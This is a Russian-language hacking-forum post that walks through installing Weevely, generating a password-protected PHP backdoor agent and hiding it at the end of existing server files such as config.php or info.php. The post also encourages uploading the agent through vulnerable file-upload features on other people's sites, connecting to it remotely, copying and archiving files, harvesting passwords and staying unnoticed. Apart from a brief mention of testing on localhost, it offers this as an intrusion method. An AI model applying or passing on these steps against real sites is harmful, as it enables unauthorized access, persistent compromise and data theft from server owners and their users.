Вставка бэкдора на PHP вебсайтах с Weevely

  • Автор темы HHIDE_DUMP
  • Дата начала
  • Просмотры 704
  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • У нас появилось зеркало в сети Tor, присоединяйтесь!
    Для входа используйте следующий url: http://darktimeriaou2b2.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

HHIDE_DUMP

Гость
H

HHIDE_DUMP

Гость
Очень удобно оставлять после себя бэкдоры, если вы однажды уже смогли найти путь на сервер, и они смогут пригодиться в большом количестве случаев. Они хороши для разработчиков, которые хотят иметь быстрый доступ к машинам, на которых они работают, или для системных администраторов, которым нужен такой же доступ. Также, безусловно, бэкдоры являются лучшими друзьями хакеров и могут быть добавлены множеством способов. Одним хорошим инструментом для этого является Weevely, который использует отрезок PHP кода.

Weevely создает терминал на целевой машине и позволяет действовать удаленному коду через небольшой след PHP агента. Он включает в себя более 30 модулей для административных и технических нужд, а также разрешение расширения и даже сетевое радиальное смещение. Подумайте о тех аккаунтах, что вы используете, которые блокируют ваш доступ – здесь это может пригодиться, также как и на других серверах, на которые вам удалось просочиться.

В данном руководстве, мы будем брать это за основу на нашем локальном хосте. Вы можете следовать этому, или запустить его на другом сервере, где вы сможете сделать с ним намного больше.



Step 1 Скачиваем Weevely
Weevely может быть встроен в некоторые версии Linux, например, Kali. Если он не установлен на вашей системе Linux, вы можете найти 3 версию на
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
. Чтобы установить его на стандартный Linux distro, есть множество способов сделать это, включая
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
, HTTP, и wget.

  • Скачать Git файл:
    Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
  • Скачать через HTTP прямо сейчас в вашем браузере:
    Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
  • скачать через wget (в вашем терминале):
Код:
wget https://github.com/epinna/weevely3/archive/master.zip
Step 2 Создание фрагмента PHP
Не имеет значение, как вы установили Weevely, убедитесь, что у вас есть терминал или окно оболочки, открытое в директории содержащей файл master.zip. Предположим, что вы скачали его в папку Downloads, перейдем в нее, распакуем файлы, перейдите в папку с распакованными файлами и просмотрите ее содержимое.

Код:
cd Downloads
unzip master.zip
cd weevely3-master/
ls
Вам нужно запустить установочный файл weevely.py отдельно для того, чтобы понять то, о чем мы говорим здесь, потому что скрипт требует особого синтаксиса, и вы можете узнать о нем здесь.
Код:
./weevely.py


В нашем примере, мы будем использовать опцию "Generate backdoor agent". Пусть наш пароль будет следующим pazzWurD, и назовем путь нашего PHP файла backdoor.php. Мы должны получить файл под названием backdoor.php в той же директории, где мы работаем.

Обратите внимание, что backdoor.php не является хорошим именем для вашего PHP файла. Это всего лишь пример. Вы не хотите привлекать много внимания к тому, что вы делаете, поэтому убедитесь, что вы заменили название файлов "mypassword" и "myfilename.php" на что-то менее очевидное.

Код:
./weevely.py generate mypassword myfilename.php

Step 3 Вставка вашего Backdoor
Теперь, вооружившись новым PHP скриптом (в нашем случае это backdoor.php), мы можем рассмотреть несколько способов его применения. Сначала, если у вас есть доступ к серверу вы можете просто скопировать/вставить содержимое вашего PHP файла в другой доступный PHP файл на сервере. Например, в config.php или settings.php файлы, которые вы можете там найти. Сначала, я скопирую содержимое моего backdoor.php скрипта в текстовом редакторе.


Затем, я вставлю целый блок кода PHP внизу всего остального PHP кода в файле запущенном на моем сервере. Здесь, я вставляю его внизу всего в файле info.php на моем сервере. Мне пришлось использовать Vi редактор на моем сервере.


Мой info.php продолжает работать в обычном режиме, но скрипт, указанный ниже, продолжает оставаться неизменным до обращения к нему

Другая вещь, которую вам следует попробовать, это найти уязвимый сайт с возможностью загрузки на него информации – свойство, которое позволяет вам делиться файлами или изображениями. Сделайте это, получить ссылку на ваш файл и вы в деле.


Большинство сайтов, как этот, будет блокировать загрузку скриптов, но не каждый сайт является совершенным.

Как бы вы это ни сделали, вы хотите поместить ваш backdoor.php файл — или содержимое вашего PHP файла — в другой PHP файл, на каком-то локальном или удаленном сервере.



Step 4 Доступ к вашему бэкдору
Первое, что вы можете заметить в Weevely это то, что ваш backdoor.php файл, запущенный в веб-директории или в конце другого PHP файла, ничего не делает и не показывает в вашем браузере. И это хорошо! Если бы ваш файл отображался на сайте, он был бы сразу замечен и подправлен, или даже использован кем-либо еще, а нам этого совсем не нужно.


Что нам нужно, так это снова открыть файл weevely.py на нашей системе, только в этот раз мы не будем создавать файл с ним – мы используем его, чтобы указать место, куда мы посетим созданный ранее скрипт. На моем локальном хосте с моими файлами, это выглядит так:

Код:
./weevely.py http://localhost/info.php pazzWurD
Если Вы не тестируете это с локального хоста, это выглядит чем-то подобным:
Код:
./weevely.py http://some.websitename.com/myfilename.php mypassword
Так или иначе, используйте Weevely, чтобы вызвать ваш файл, и вы увидите следующий ответ:


Просто напечатайте: help, и это покажет вам все, что вы можете делать из этой позиции.

В Weevely встроены дополнительные 30 модулей, так что существует множество моментов для работы. Например, file_ls делает точно то, что вы подумали, а file_cp может позволить вам скопировать файл, как только вы разработаете пути от и до, как на локальной системе. Вы сможете получить все сразу при помощи file_tar, затем используйте cp, чтобы получить много материалов для чтения.

Есть несколько путей увеличить ваши права в Weevely, так что если у вас есть расширенные права на сервере, вы можете делать практически все с ним. Вы сможете получить несколько ключей на вашей целевой системе с audit_password. Не забывайте оставаться внизу здесь, чтобы сохранить ваше время и силы, если вы не можете разобраться с вашей собственной системой, и чтобы остаться незамеченным в чужой системе.

Устранение проблем
Возникали ли у вас ошибки во время выполнения этих упражнений? Я работал на новой системе, так что пока я распаковывал директорию master.zip, и смотрел файлы, которые она содержит, я не мог получить Weevely's Python скрипт, для корректного запуска. Если у вас подобная ситуация и вы видите следующее:

Код:
ImportError: No module named prettytable
Сделайте что-то вроде следующего, замещая имя модуля, того чего не хватает:

Код:
$ sudo apt install python-prettytable
 

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2021

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя